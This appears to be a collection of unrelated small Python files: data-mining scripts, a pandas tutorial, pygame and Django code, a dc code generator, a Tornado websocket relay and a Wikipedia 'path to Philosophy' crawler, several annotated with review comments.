        stp_list=np.load(input_dir+"/TP_dict_%s.npy" % (uid))
        print(uid, len(stp_list))
        # Users with fewer than 5 mined patterns are skipped entirely.
        if len(stp_list) < 5:
            continue
        else:
            for stp in stp_list: # STP_Supp(ldaStr=gamma,tau=tau,supp=Supp_gamma_tau[tau],l=gamma_len)
                if uid not in CTP4tau_dict[stp.tau].keys():
                    CTP4tau_dict[stp.tau][uid] = []
                CTP4tau_dict[stp.tau][uid].append(stp)
    for i, tau in enumerate(TI):
        np.save(output_dir + "/TP_dict_%s.npy" % (tau), CTP4tau_dict[tau])
def dict2mat(input_dir, tau):
    """Convert one tau bucket's pattern dict into its matrix form.

    Loads "TP_dict_<tau>.npy", builds the user-by-pattern support
    matrix, and writes "TP_MAT_<tau>.npy" plus the per-pattern global
    (user-averaged) support "global_supp_<tau>.npy".
    """
    if os.path.exists(input_dir + "/TP_dict_%s.npy" % (tau)):
        ''' tau_stp_supp[uid] = stp_list '''
        tau_stp_supp = np.load(input_dir + "/TP_dict_%s.npy" % (tau)).item(0)
        uid_list = sorted(tau_stp_supp.keys())
        ''' convert dict to mat '''
        uid_phi_MAT = transform(uid_list, tau_stp_supp)
        ''' calculate the global support for each pattern '''
        supp_sum_list = np.sum(uid_phi_MAT, axis=0)
        supp_avg_list = [supp / len(uid_list) for supp in supp_sum_list]
        ''' storage '''
        np.save(input_dir + "/TP_MAT_%s.npy" % (tau), uid_phi_MAT)
        np.save(input_dir + "/global_supp_%s.npy" % (tau), supp_avg_list)
        print("end converting dictionaries into matrix... ", input_dir, tau, time.time())
def run_one_tau(input_dir, output_dir):
    """Bucket the per-user pattern files by tau, then materialize the
    support matrix for every configured time interval."""
    file2dict(input_dir, output_dir)
    for interval in TI:
        dict2mat(output_dir, interval)
if __name__ == '__main__':
    ''' the mined CTPs (sequential) (min_count=2) for each user is stored in User/TISEQ_2 '''
    ''' the mined CTPs (interleaving) (min_count=2) for each user is stored in User/TIILV '''
    ''' the mined STPs (min_count=2) for each user is stored in User/STP '''
    # One (input_dir, output_dir) pair per pattern family.
    List_ = [(os.path.join(ROOT,"User/TISEQ_2"), os.path.join(ROOT, "CTP/SEQ")),
             (os.path.join(ROOT,"User/TIILV"), os.path.join(ROOT, "CTP/ILV")),
             (os.path.join(ROOT,"User/STP"), os.path.join(ROOT, "CTP/STP"))]
    # NOTE(review): the pool is sized to len(TI) although only one task
    # per directory pair (3 total) is submitted — confirm intended.
    pool = multiprocessing.Pool(len(TI))
    for (input_dir, output_dir) in List_:
        pool.apply_async(run_one_tau, args=(input_dir, output_dir))
    pool.close()
    pool.join()
|
'''Test utility functions'''
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import numpy as np
import wavenet.utils as utils
def test_sample_from():
    """sample_from should return one label index per distribution row,
    each label lying within [0, n_classes)."""
    probs = np.array([
        [0.1, 0.2, 0.7],
        [0.4, 0.5, 0.1],
        [0.1, 0.1, 0.8],
        [0.9, 0.05, 0.05],
        [0.33, 0.33, 0.34],
    ])
    picked = utils.sample_from(probs)
    assert picked.shape == (5, )
    # Labels are valid class indices for 3-way distributions.
    assert np.all((picked >= 0) & (picked < 3))
|
import abc
from pygameAssets import pygameAssets, pygame
from object_display import Object_display
from recipe_data import Recipe_data
from points import Point, Rectangle
from price import Price
from pay import Pay
class Button(Object_display):
    """Abstract base for clickable buttons rendered via pygameAssets.

    Subclasses implement draw() and click().
    """
    def __init__(self, w: int, h: int, coordinate: Rectangle):
        super().__init__(w, h)
        # Own copy so later moves don't mutate the caller's rectangle.
        self.coordinate: Rectangle = coordinate.copy()
        pygameAssets.Button.setScreen(Object_display.screen)
    @abc.abstractmethod
    def draw(self, other=None):
        pass
    def setText(self, text: str):
        """Forward the label text to the underlying widget."""
        self.widget.setText(text)
    def resize(self, w: int, h: int):
        """Scale the normalized rectangle to the new window size and
        rebuild the underlying pygameAssets widget."""
        self.rec = self.coordinate.copy() * Point((w, h))
        self.widget = pygameAssets.Button(self.rec.point.x, self.rec.point.y, self.rec.size.x // 2, 40,
                                          color=(0, 200, 0), text='zapłać', textColor=(0, 0, 0),
                                          activeColor=(0, 0, 100), fontSize=40)
    @abc.abstractmethod
    def click(self, event: pygame.event):
        pass
class Button_ok(Button):
    """Recipe confirmation button: green when the recipe's ingredients
    are complete, red otherwise; a press opens the payment screen."""
    def __init__(self, coordinate: Rectangle, w: int, h: int, receipe: Recipe_data):
        super().__init__(w, h, coordinate)
        # Anchor the button near the bottom-center of the given rectangle.
        self.coordinate.move(Point((self.coordinate.size.x / 2, self.coordinate.size.y - 0.1)))
        self.resize(w, h)
        self.receipe = receipe
    def draw(self, other=None):
        # Green when the recipe can be paid for, red when incomplete.
        if self.receipe.ingredient_completed:
            self.widget.setColor((0, 200, 0))
        else:
            self.widget.setColor((200, 0, 0))
        self.widget.draw()
    def click(self, event: pygame.event):
        if self.receipe.ingredient_completed:
            if self.widget.isPressed(event):
                # Runs the payment screen modally.
                Pay(self.screen_w, self.screen_h, self.receipe.price, self.receipe).run()
        # NOTE(review): always returns False, even after a successful
        # press — Button_pay.click returns True in that case; confirm
        # callers do not rely on True here.
        return False
class Button_pay(Button):
    """Payment button that unlocks once the inserted amount equals the
    price passed to draw()."""
    def __init__(self, coordinate: Rectangle, w: int, h: int, count: int):
        super().__init__(w, h, coordinate)
        # Locked until draw() observes the exact amount.
        self.lock = True
        self.count = count
        self.resize(w, h)
    # NOTE(review): mutable default `Price()` is shared across calls —
    # harmless only if Price() is never mutated; verify.
    def draw(self, price: Price = Price()):
        # Unlock (and turn green) when the counted amount matches the price.
        if self.count == price:
            self.lock = False
            self.widget.setColor((0, 200, 0))
        else:
            self.widget.setColor((200, 0, 0))
        self.widget.draw()
    def click(self, event: pygame.event):
        # True only for a press while unlocked.
        if self.widget.isPressed(event):
            if self.lock is False:
                return True
        return False
|
from django.shortcuts import render, HttpResponse, redirect
def index(request):
    """Render the survey form page."""
    return render(request, 'survey/index.html')
def process(request):
    """Store the submitted survey fields in the session, bump the
    per-session submission counter, and redirect to the result page.

    Improvement: the original initialized the counter via a broad
    ``except Exception`` around the increment; ``session.get`` expresses
    the same first-submission-defaults-to-0 logic without swallowing
    unrelated errors.
    """
    if request.method == "POST":
        request.session['data'] = {
            "Name": request.POST['name'],
            "Location": request.POST['location'],
            "Language": request.POST['language'],
            "Comments": request.POST['comments']
        }
        # First submission initializes the counter; later ones increment.
        request.session['count'] = request.session.get('count', 0) + 1
    return redirect('survey:result')
def result(request):
    """Render the survey result page (reads data/count from the session template-side)."""
    return render(request, 'survey/result.html')
|
#!/usr/local/bin/python3
import sys
import os
#function taken from https://stackoverflow.com/questions/2460177/edit-distance-in-python
def levenshteinDistance(s1, s2):
    """Edit distance (insert/delete/substitute) between two strings,
    via the classic rolling-row dynamic program.

    Adapted from https://stackoverflow.com/questions/2460177/edit-distance-in-python
    """
    # Keep the shorter string on the row axis so the rolling row stays small.
    if len(s1) > len(s2):
        s1, s2 = s2, s1
    previous = list(range(len(s1) + 1))
    for row, ch2 in enumerate(s2, start=1):
        current = [row]
        for col, ch1 in enumerate(s1):
            if ch1 == ch2:
                # Characters match: no extra edit over the diagonal cell.
                current.append(previous[col])
            else:
                # 1 + cheapest of substitute / delete / insert.
                current.append(1 + min(previous[col], previous[col + 1], current[-1]))
        previous = current
    return previous[-1]
#this function finds the new apk name in a repo when the build process changes the apk
#name slightly
def findAPKInRepo(repo, apkName):
    """Locate the apk under *repo* whose path is closest (by edit
    distance) to *apkName*; exits when the repo contains no apks.

    Used to re-find an apk after the build process slightly renames it.
    """
    candidates = [
        os.path.join(root, name)
        for root, dirs, names in os.walk(repo)
        for name in names
        if name.endswith('.apk')
    ]
    if not candidates:
        print('error: unable to find any apks in repo: {0}'.format(repo))
        sys.exit(1)
    # min() returns the first minimum, matching the original strict-<
    # scan; a single candidate is trivially the minimum.
    return min(candidates, key=lambda apk: levenshteinDistance(apkName, apk))
if __name__=="__main__":
    # Quick manual sanity check of the metric on realistic apk names.
    orig1 = 'org.flyve.mdm.agent_2020-01-22_210349-fcm-debug.apk'
    test1 = 'org.flyve.mdm.agent_2020-01-22_211120-fcm-debug.apk'
    test2 = 'org.flyve.mdm.agent_2020-01-22_211120-mqtt-debug.apk'
    print(levenshteinDistance(orig1, test1))
    print(levenshteinDistance(orig1, test2))
from transformers import AutoModel
from torch import nn
class MiniModel(nn.Module):
    """A pretrained transformer encoder feeding two parallel linear heads."""

    def __init__(self, model_name, n_labels_A, n_labels_B):
        super().__init__()
        self.model = AutoModel.from_pretrained(model_name)
        # assumes the encoder hidden size is 768 — TODO confirm for model_name
        self.first_classifier = nn.Linear(768, n_labels_A)
        self.second_classifier = nn.Linear(768, n_labels_B)

    def forward(self, input_ids, attention_mask):
        """Encode the batch and return (A_logits, B_logits)."""
        encoded = self.model(input_ids, attention_mask=attention_mask)
        pooled = encoded[1]  # presumably the pooler output — verify for the chosen model
        return self.first_classifier(pooled), self.second_classifier(pooled)
|
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 02 18:27:00 2015
@author: Yang
"""
import pandas as pd
import numpy as np
# NOTE(review): originally written with Python-2 print statements; converted
# to print() calls, which behave identically on Python 2 (single argument)
# and Python 3.

# --- object creation ---
s = pd.Series([1, 3, 5, np.nan, 6, 8])
print(s)
dates = pd.date_range('20130101', periods=6)
print(dates)
df = pd.DataFrame(np.random.randn(6, 4), index=dates, columns=list('ABCD'))
print(df)
df2 = pd.DataFrame({'A': 1.,
                    'B': pd.Timestamp('20130102'),
                    'C': pd.Series(1, index=list(range(4)), dtype='float32'),
                    'D': np.array([3] * 4, dtype='int32'),
                    'E': pd.Categorical(["test", "train", "test", "train"]),
                    'F': 'foo'})
print(df2)
print(df2.dtypes)
print(df2.C)
# --- viewing data ---
print(df.head())
print(df.tail(3))
print(df.index)
print(df.columns)
print(df.values)
print(df.describe())  # bug fix: was `print df.describe` (printed the bound method)
print(df.T)
# --- selection ---
print(df['A'])
print(df[0:3])
print(df['20130102':'20130104'])
print(df.loc[:, ['A', 'B']])
print(df.loc['20130102':'20130104', ['A', 'B']])
print(df.loc['20130102', ['A', 'B']])
print(df.loc[dates[0], 'A'])
print(df.at[dates[0], 'A'])
print(df.iloc[3])
print(df.iloc[[1, 2, 4], [0, 2]])
print(df[df.A > 0])
print(df[df > 0])
df2 = df.copy()
df2['E'] = ['one', 'one', 'two', 'three', 'four', 'three']
print(df2)
print(df2[df2['E'].isin(['two', 'four'])])
# --- setting ---
s1 = pd.Series([1, 2, 3, 4, 5, 6], index=pd.date_range('20130102', periods=6))
print(s1)
df['F'] = s1
df.at[dates[0], 'A'] = 0
df.iat[0, 1] = 0
df.loc[:, 'D'] = np.array([5] * len(df))
print(df)
df2 = df.copy()
df2[df2 > 0] = -df2
print(df2)
# --- missing data ---
df1 = df.reindex(index=dates[0:4], columns=list(df.columns) + ['E'])
df1.loc[dates[0]:dates[1], 'E'] = 1
print(df1)
print(df1.dropna(how='any'))
print(df1.fillna(value=5))
print(df1)
print(pd.isnull(df1))
# --- operations ---
print(df)
print(df.mean(1))
s = pd.Series([1, 3, 5, np.nan, 6, 8], index=dates).shift(2)
print(s)
print(df.sub(s, axis='index'))
s = pd.Series(['A', 'B', 'C', 'Aaba', 'Baca', np.nan, 'CABA', 'dog', 'cat'])
print(s.str.lower())
# --- merge / concat ---
df = pd.DataFrame(np.random.randn(10, 4))
print(df)
pieces = [df[:3], df[3:7], df[7:]]
print(pd.concat(pieces))
left = pd.DataFrame({'key': ['foo', 'foo'], 'lval': [1, 2]})
right = pd.DataFrame({'key': ['foo', 'foo'], 'rval': [4, 5]})
print(pd.merge(left, right, on='key'))
print(left)
print(right)
# --- grouping ---
df = pd.DataFrame({'A': ['foo', 'bar', 'foo', 'bar',
                         'foo', 'bar', 'foo', 'foo'],
                   'B': ['one', 'one', 'two', 'three',
                         'two', 'two', 'one', 'three'],
                   'C': np.random.randn(8),
                   'D': np.random.randn(8)})
print(df)
print(df.groupby('A').sum())
print(df.groupby(['A', 'B']).sum())
# --- plotting (requires matplotlib to be installed) ---
ts = pd.Series(np.random.randn(1000), index=pd.date_range('1/1/2000', periods=1000))
ts = ts.cumsum()
ts.plot()
df = pd.DataFrame(np.random.randn(1000, 4), index=ts.index,
                  columns=['A', 'B', 'C', 'D'])
df = df.cumsum()
df.plot()
|
import math
class Solution(object):
    """LeetCode 204: count the primes strictly below n (sieve of Eratosthenes)."""

    def countPrimes(self, n):
        """
        :type n: int
        :rtype: int — number of primes p with 2 <= p < n
        """
        is_prime = [True] * n
        # Only sieve with factors up to sqrt(n); start crossing out at p*p.
        for p in range(2, int(math.sqrt(n)) + 1):
            if not is_prime[p]:
                continue
            for multiple in range(p * p, n, p):
                is_prime[multiple] = False
        # 0 and 1 are not prime; skip the first two slots.
        return sum(1 for flag in is_prime[2:] if flag)
|
from typing import List
from ..parser.ast import AST, Node
from ..scanner.tokens import Tokens
from ..semantic import COMPUTATION_NODES, CONSTANT_NODES
class CodeGenerator:
    """
    Generates code for the dc language from an AST of the ac language.

    Emitted tokens are collected in `self.generated`; callers retrieve
    them via generate().
    """
    def __init__(self, ast: AST):
        self.ast = ast
        # Flat list of dc tokens, appended to by emit().
        self.generated = list()
    def visit_assignment(self, node: Node) -> None:
        """
        Visits an assignment node and emits dc code for that assignment:
        evaluate the right-hand side, store it ("s<ID>") and reset the
        precision ("0 k").
        :param node: the assignment node to visit and emit dc code for
        """
        self.codegen(node.right())
        self.emit("s")
        self.emit(f"{node.left().value}") # emit ID
        self.emit("0 k")
    def visit_computation(self, node: Node) -> None:
        """
        Visits a computation node and emits dc code for that computation
        (postfix: both operands, then the operator).
        :param node: the computation node to visit and emit dc code for
        """
        self.codegen(node.left())
        self.codegen(node.right())
        self.emit("+" if node.type == Tokens.PLUS else "-")
    def visit_reference(self, node: Node) -> None:
        """
        Visits a reference node and emits the ID of that node
        ("l<ID>" loads the named register onto the stack).
        :param node: the reference node to visit and emit dc code for
        """
        self.emit("l")
        self.emit(node.value)
    def visit_print(self, node: Node) -> None:
        """
        Visits a print node and emits the value of the symbol referenced in
        that node: load ("l<ID>"), print ("p"), then pop into the scratch
        register i ("si") to clear the stack.
        :param node: the print node to visit and emit dc code for
        """
        self.emit("l")
        self.emit(node.value)
        self.emit("p")
        self.emit("si")
    def visit_convert(self, node: Node) -> None:
        """
        Visits a convert node, emit the value of child, and emit dc code to change the
        precision level to five decimal places ("5 k").
        :param node: the convert node to visit and emit dc code for
        """
        self.emit(node.child().value)
        self.emit("5 k")
    def visit_constant(self, node: Node) -> None:
        """
        Visits a constant node and emits its value in dc code.
        :param node: the constant node to visit and emit dc code for
        """
        self.emit(node.value)
    def codegen(self, node: Node) -> None:
        """
        Generates dc code by calling the relevant visitor method for the given node.

        NOTE(review): this method recurses into all children before
        dispatching, and several visitors (visit_assignment,
        visit_computation) recurse into the same children again — verify
        against the Node API that operands are not emitted twice.
        :param node: the node to generate dc code for.
        """
        for child in node.children:
            self.codegen(child)
        if node.type == Tokens.ASSIGN:
            self.visit_assignment(node)
        elif node.type in COMPUTATION_NODES:
            self.visit_computation(node)
        elif node.type == Tokens.ID:
            self.visit_reference(node)
        elif node.type == Tokens.PRINT:
            self.visit_print(node)
        elif node.type == Tokens.CONVERT:
            self.visit_convert(node)
        elif node.type in CONSTANT_NODES:
            self.visit_constant(node)
    def emit(self, code: str) -> None:
        """
        Append generated code to the list of produced code.
        :param code: the code string to append to the list of generated code
        """
        self.generated.append(code)
    def generate(self) -> List[str]:
        """
        Generate dc code from the AST produced by the parser
        :return: the list of generated dc code statements
        """
        self.codegen(self.ast.root)
        return self.generated
|
from os import listdir
from numpy import asarray
from numpy import savez_compressed
from PIL import Image
from mtcnn.mtcnn import MTCNN
from matplotlib import pyplot
def load_image(filename):
    """Load an image from disk and return its pixels as an RGB numpy array."""
    # Context manager fixes a file-handle leak: Image.open reads lazily and
    # the original never closed the file. convert() forces the decode, so
    # the handle can be released before returning.
    with Image.open(filename) as image:
        return asarray(image.convert('RGB'))
def load_faces(directory, n_faces):
    """
    Load up to n_faces images from `directory` (which must end with a
    path separator — paths are built by plain concatenation) and return
    them as a single numpy array.
    """
    # NOTE(review): the original instantiated MTCNN() here but never used it
    # (no face detection is performed in this function) — the expensive,
    # dead model load has been removed.
    faces = list()
    # enumerate files
    for filename in listdir(directory):
        # load the image
        pixels = load_image(directory + filename)
        # store
        faces.append(pixels)
        print(len(faces), pixels.shape)
        # stop once we have enough
        if len(faces) >= n_faces:
            break
    return asarray(faces)
# directory that contains all images
# (the trailing slash matters: load_faces concatenates directory + filename)
directory = 'otherImgs/'
# load and extract all faces
all_faces = load_faces(directory, 1620)
print('Loaded: ', all_faces.shape)
# save in compressed format
savez_compressed('images.npz', all_faces)
import time
def addHeightsToDict(x, dictHeights):
    """Increment the occurrence count of x in dictHeights and return the dict."""
    dictHeights[x] = dictHeights.get(x, 0) + 1
    return dictHeights
# NOTE(review): Python 2 script (xrange, dict.iteritems, print statement,
# list-returning map) — it will not run unmodified under Python 3.
start_time = time.time()
# f = open("B-small-attempt01.in")
# f = open("B-large01.in")
f = open("B-large1.in")
result = open('B-large1.in.txt', 'w')
# result = open('B-large-output.txt', 'w')
cases = int(f.readline().rstrip())
for x in xrange(0, cases):
    N = int(f.readline().rstrip())
    dictHeights = {}
    # Each case has 2N-1 rows of heights; the row whose values appear an
    # odd number of times is the missing one.
    for h in xrange(0, 2*N - 1):
        rowCol = f.readline().rstrip().split()
        abc = map(lambda x: addHeightsToDict(x, dictHeights), rowCol)
    # get only odd (missing) items
    missingRowColDict = {k:v for k,v in dictHeights.iteritems() if v%2 != 0 }
    # convert missing row into sorted list
    missingRowCol = map(int, missingRowColDict.keys())
    missingRowCol.sort()
    print missingRowCol
    caseResult = "Case #"+str(x+1)+": " + ' '.join(map(str, missingRowCol)) + "\n"
    result.write(caseResult)
f.close()
result.close()
print("--- %s seconds ---" % (time.time() - start_time))
|
import json
import time
import tornado.websocket
import services.dbHandler as database
# Initialise the backing store before any websocket connections arrive.
database.init_database()
debug = True
# All currently connected websocket clients (rpi agents and interfaces).
clients = []
# Socket Handler
class WebSocketHandler(tornado.websocket.WebSocketHandler):
    """Relay hub: forwards messages between rpi clients and UI clients."""
    def open(self):
        # Peers identify themselves with a 'Hostname' header; browser
        # interfaces do not send one and are labelled 'interface'.
        if 'Hostname' in self.request.headers:
            client_hostname = self.request.headers['Hostname']
        else:
            client_hostname = 'interface'
        self.hostname = client_hostname
        database.init_client_state(client_hostname)
        print('New client connection with hostname: ' + client_hostname)
        # Broadcast before registering self, so the announcement only
        # reaches the already-connected clients.
        self.send_all('new_connection')
        clients.append(self)
    def on_message(self, message):
        global database
        message_decoded = json.loads(message)
        print('Receiving from client: %s' % message_decoded)
        if 'type' in message_decoded:
            if 'rpi_client' == message_decoded['type']:
                # State report from an rpi agent: persist it.
                update_table(message_decoded)
            if 'interface' == message_decoded['type']:
                # Command from the UI: broadcast to everyone, incl. sender.
                self.send_all("command", True, message_decoded['message'])
    def on_close(self):
        print('Client connection closed')
        print(self.hostname)
        clients.remove(self)
    def send_all(self, type, include_self=False, msg=None):
        # NOTE(review): parameter `type` shadows the builtin of the same name.
        # Sends to every other client; include_self=True also echoes back.
        for client in clients:
            if client.hostname != self.hostname or include_self:
                client.write_message({
                    'hostname': self.hostname,
                    'message': msg,
                    'type': type,
                })
def pre_update():
    """
    Decorator factory: log the wrapped call, execute it, then run the
    analyse_db() post-processing hook before returning the result.
    """
    from functools import wraps

    def decorated(func):
        @wraps(func)  # bug fix: preserve the wrapped function's __name__/__doc__
        def wrapper(*args, **kwargs):
            print("Exécution de la fonction %s." % func.__name__)
            response = func(*args, **kwargs)
            print("Post-traitement.")
            analyse_db()
            return response
        return wrapper
    return decorated
@pre_update()
def update_table(msg):
    """Persist an rpi state message, stamping the receive time first."""
    msg['time'] = time.time()
    global database
    # msg['id'] identifies the client record to update — presumably set by
    # the rpi agent; confirm the message schema.
    new_state = database.update(msg, msg['id'])
    print("NEW STATE", new_state)
def analyse_db():
    # Post-update hook invoked by the pre_update decorator; currently a stub.
    print('post Request::DB STATE ...')
|
# marca centenario RJ
# functions
def draw_lines(points, t):
    """Stroke a closed path through `points` with stroke width `t` (NodeBox)."""
    # set drawing state: outline only, black stroke
    autoclosepath(True)
    nofill()
    stroke(0)
    strokewidth(t)
    # build the path: first point starts it, the rest extend it
    beginpath()
    for index, (px, py) in enumerate(points):
        if index == 0:
            moveto(px, py)
        else:
            lineto(px, py)
    endpath()
def draw_points(points, point_size):
    """Draw a red dot of diameter `point_size` centred on each point (NodeBox)."""
    # set drawing state: solid red, no outline
    fill(1, 0, 0)
    nostroke()
    half = point_size / 2
    for px, py in points:
        # oval() takes the top-left corner, so offset by the radius
        oval(px - half, py - half, point_size, point_size)
# parameters
w = h = 448                 # canvas size
x, y = w/2, h/2             # canvas centre
d = 48                      # half-gap between parallel edges
axis = 158                  # reach of each edge along the axes
s = 22                      # point-marker diameter
t = 23                      # stroke width
_draw_points = True
# points: eight vertices of the mark, listed in drawing order
_points = [
    ( x - axis, y - d ),
    ( x + axis, y - d ),
    ( x + d, y - axis ),
    ( x + d, y + axis ),
    ( x + axis, y + d ),
    ( x - axis, y + d ),
    ( x - d, y + axis ),
    ( x - d, y - axis ),
]
# draw
size(w, h)
draw_lines(_points, t)
if _draw_points:
    draw_points(_points, s)
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# df = pd.read_csv('test.csv')
# df = pd.read_csv ('test.csv', na_values = ['-','not available']) # treat '-' and 'not available' as NaN
df = pd.read_csv('test.csv', na_values={ # per-column NaN markers (better: map them all to NaN)
    'nama':'-',
    'usia':['-','not available',-1],
    'job':['-','not available']
    }
)
# df = df.fillna(0) # replace every NaN with the given value
# df = df.fillna({ # per column
#     'nama' : 'Anonim',
#     'usia' : 20,
#     'job' : 'Staff'
# })
# df = df.fillna(method='ffill',axis=1) # fill NaN from the previous entry along the axis
# df = df.fillna(method='bfill',axis=1) # fill NaN from the next entry along the axis
# df = df.interpolate().fillna({ # interpolate numeric NaN from neighbouring values
#     'nama':'Anonim',
#     'usia': 20,
#     'job':'Jobless'
# })
# df = df.dropna() # drop any row containing NaN
# df = df.dropna(how='all') # drop only rows whose values are all NaN
# df = df.dropna(thresh=1) # keep rows with at least 1 non-NaN column
df = df.dropna(subset=['job']) # drop rows where the 'job' column is NaN
print(df)
# -*-coding:utf8-*-
from django.shortcuts import render_to_response
# Create your views here.
def login(request):
    """Login view — placeholder, not yet implemented."""
    pass
|
# Processing.py sketch — presumably run inside the Processing environment,
# which provides size(), circle() and random(); confirm before running.
x=0
def setup ():
    # Runs once: set the 400x400 canvas.
    size (400 , 400)
def draw ():
    # Runs every frame: draw five 10px circles at random positions.
    # NOTE(review): the loop variable x shadows the module-level x above.
    for x in range(5):
        circle(random (0 , 400 ),random (0 , 400),10)
|
# -*- coding: utf-8 -*-
"""
Start on random article on Wikipedia and follow the first link
on main body of article that is not within parentheses or italicized,
repeating for each subsequent article until finding Philosophy page.
Stores 500 starting pages and their path lengths to Philosophy.
Keeps tracks of all visited pages and their path lengths to Philosophy
(to reduce number of http requests).
Path length value is negative if Philosophy wasn't reached.
"""
from bs4 import BeautifulSoup
import requests
import re
import pandas as pd
def remove_paren(text):
    """
    Remove parenthesized spans from a string if they are outside of tags.

    Args:
        text (string): All text from article's main section
    Returns:
        no_paren (string)

    Doctest outputs fixed: the originals were unquoted and showed a single
    space where the function actually leaves two (the spaces on both sides
    of a removed parenthesized span are kept).

    >>> remove_paren('This is (remove this) some text.')
    'This is  some text.'
    >>> remove_paren('Here is <a tag with (parentheses) that> should be left.')
    'Here is <a tag with (parentheses) that> should be left.'
    >>> remove_paren('Once more (without <this>) <but (with) this>.')
    'Once more  <but (with) this>.'
    """
    paren_depth = 0  # parenthesis nesting, counted only outside tags
    tag_depth = 0    # <...> nesting, counted only outside parentheses
    no_paren = ''
    for ch in text:
        if paren_depth == 0:
            # Track tags only while outside parentheses
            if ch == '<':
                tag_depth += 1
            if ch == '>':
                tag_depth -= 1
        if tag_depth == 0:
            # Track parentheses only while outside tags
            if ch == '(':
                paren_depth += 1
            if paren_depth == 0:
                no_paren += ch
            if ch == ')':
                paren_depth -= 1
        else:
            # Store characters inside tags verbatim (incl. parentheses)
            no_paren += ch
    return no_paren
def valid_url(url):
    """
    Checks if url is valid and reformats if needed.

    Args:
        url (string)
    Returns:
        url (string): If url contains an invalid pattern, returns 'invalid'.
        If url is valid, removes the section anchor (if any) and returns the
        url formatted as: 'http://en.wikipedia.org/wiki/some_page'.

    >>> valid_url('https://en.wikipedia.org/w/index.php?title=Burt_P._Lynwood&action=edit&redlink=1')
    'invalid'
    >>> valid_url('/wiki/Help:IPA_for_English')
    'invalid'
    >>> valid_url('#cite_note-3')
    'invalid'
    >>> valid_url('/wiki/Acacia')
    'http://en.wikipedia.org/wiki/Acacia'
    >>> valid_url('/wiki/Land#Land_mass')
    'http://en.wikipedia.org/wiki/Land'
    >>> valid_url('https://en.wikipedia.org/wiki/Class_(biology)')
    'http://en.wikipedia.org/wiki/Class_(biology)'
    """
    invalid_patterns = ['#cite',
                        'wikt:',
                        'wiktionary',
                        'redlink=',
                        'File:',
                        'Help:',
                        'Special:',
                        'Category:',
                        'Template:',
                        'Portal:',
                        'Wikipedia:',
                        'File talk:',
                        'Help talk:',
                        'Special talk:',
                        'Category talk:',
                        'Template talk:',
                        'Portal talk:',
                        'Wikipedia talk:',
                        'wikimedia']
    # Reject namespace/meta links and citation anchors outright.
    if any(pattern in url for pattern in invalid_patterns):
        return 'invalid'
    # Strip a section anchor ('#...') if present.
    octothorpe = url.find('#')
    if octothorpe != -1:
        url = url[:octothorpe]
    if url.startswith('https') and (url.find('wiki') != -1):
        # Normalize https wikipedia links to http for consistent comparison.
        return 'http' + url[5:]
    if url.startswith('/wiki/'):
        # Relative article link: prefix the host.
        return 'http://en.wikipedia.org' + url
    if url.find('wiki') != -1:
        return url
    return 'invalid'  # page outside of wikipedia
def get_next_url(soup):
    """
    Find the first valid article link in the given page.

    Args:
        soup (bs4.BeautifulSoup): BeautifulSoup of entire page
    Returns:
        The correctly formatted next link (string), or None when the page
        has no usable links.
    """
    # Drop all italicized content before looking at links.
    for italic in soup.select("i"):
        italic.decompose()
    # Keep only main-body paragraphs, with parenthesized spans removed.
    body_html = remove_paren(str(soup.select('div#mw-content-text > p')))
    clean_soup = BeautifulSoup(body_html, "html.parser")
    anchors = clean_soup.find_all('a')
    if anchors is None:
        return None
    for anchor in anchors:
        candidate = valid_url(anchor.get('href'))
        if candidate != 'invalid':
            return candidate
    return None
def get_page_title(soup):
    """Return the article title (string), stripped of the ' - Wikipedia' suffix."""
    full_title = soup.title.text
    return full_title[:full_title.find(' - Wikipedia')]
def find_philo():
    """
    Starting on a random wikipedia page, finds Philosophy.
    Returns:
        int: Length of path, -1 if Philosophy not found (no valid links found,
        or search ended in a loop).
        this_series (list): List of all pages in order of encounter.
    """
    i = 0
    this_series = [] # pages encountered in this run
    page_title = ''
    url = 'http://en.wikipedia.org/w/index.php?title=Special:Random' #random url
    philo_url = 'http://en.wikipedia.org/wiki/Philosophy'
    r = requests.get(url)
    url = r.url
    while url != philo_url:
        if i > 0:
            # The first page was already fetched above (to resolve the redirect).
            r = requests.get(url)
        soup = BeautifulSoup(r.text, "html.parser")
        page_title = get_page_title(soup)
        if i == 0:
            print("--- Starting on: ", page_title, " ---")
        else:
            print(page_title)
        if page_title in this_series:
            print("Circular path, ending search.")
            return -1, this_series
        if page_title in all_pages.page.values:
            # Cache hit: reuse the stored distance-to-Philosophy.
            print("Page already visited, ending search.")
            page_idx = all_pages.loc[all_pages.page==page_title].index.tolist()[0]
            # NOTE(review): DataFrame.get_value was removed in pandas 1.0;
            # the modern equivalent is all_pages.at[page_idx, 'count'].
            num = all_pages.get_value(page_idx, 'count')
            if num > 0:
                print("Philosophy found in ", int(i + num), " steps.")
                return i + num, this_series
            else:
                return -1, this_series
        # NOTE(review): the bare expression below is a no-op — presumably a
        # misplaced print("Failed to find Philosophy."); confirm intent.
        ("Failed to find Philosophy.")
        this_series.append(page_title)
        url = get_next_url(soup)
        if url is None:
            print("No valid links found, ending search.")
            return -1, this_series
        i += 1
    print("Philosophy found in ", i, " steps.")
    return i, this_series
all_pages = pd.DataFrame(columns=['page', 'count']) # cache including all pages encountered
starting_pages = pd.DataFrame(columns=['page', 'count']) # starting pages and their path lengths
i = 0
# Run 500 random-start searches; each visited page on a successful path is
# cached with its remaining distance to Philosophy (count decreases along
# the path; negative count marks a failed search).
# NOTE(review): DataFrame.append was removed in pandas 2.0 — use pd.concat.
for i in range(500):
    count, this_series = find_philo()
    starting_pages = starting_pages.append({"page": this_series[0], "count": count}, ignore_index=True)
    for page in this_series:
        all_pages = all_pages.append({"page": page, "count": count}, ignore_index=True)
        count -= 1
print("Search done!")
distribution_all = starting_pages['count']
# Restrict stats to searches that actually reached Philosophy (count >= 0).
dist_end_in_philo = starting_pages[starting_pages['count'] >= 0]['count']
print("-----------------------------------------")
print(len(dist_end_in_philo), "/500 pages found Philosophy.")
print("Path lengths mean: ", dist_end_in_philo.mean())
print("Standard deviation: ", dist_end_in_philo.std())
print("Maximum: ", dist_end_in_philo.max())
print("Minimum: ", dist_end_in_philo.min())
print("Top five path lengths:")
print("Length | Count",)
print(dist_end_in_philo.value_counts().head())
# Store values for further analysis
starting_pages.to_csv('save/starting_pages.csv')
all_pages.to_csv('save/all_pages.csv')
dist_end_in_philo.to_csv('save/dist_end_in_philo.csv')
|
import logging
from datetime import datetime
from .exceptions import DoesNotExist, MultipleObjectsReturned
from .data import language_codes
